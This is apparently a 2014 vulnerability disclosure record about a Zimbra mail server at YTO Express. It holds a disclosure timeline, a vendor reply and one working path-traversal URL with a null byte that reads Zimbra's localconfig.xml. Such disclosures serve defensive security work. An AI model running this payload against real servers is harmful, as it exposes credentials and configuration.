2014-05-11:细节已通知厂商并且等待厂商处理中
2014-05-14:厂商已经确认,细节仅向厂商公开
2014-05-24:细节向核心白帽子及相关领域专家公开
2014-06-03:细节向普通白帽子公开
2014-06-13:细节向实习白帽子公开
2014-06-25:细节向公众公开
.......
详细说明:http://mail.yto.net.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
漏洞证明:
修复方案:
升级zimbra
版权声明:转载请注明来源 m1x7e1@乌云 漏洞回应 厂商回应:危害等级:低
漏洞Rank:5
确认时间:2014-05-14 14:09
厂商回复:此漏洞实际为权限提升漏洞。
已验证的确是存在此漏洞,但是关键端口未开放,故漏洞暂时不可利用,只能造成敏感配置信息泄漏。
谢谢对圆通速递信息安全建设的关注!
暂无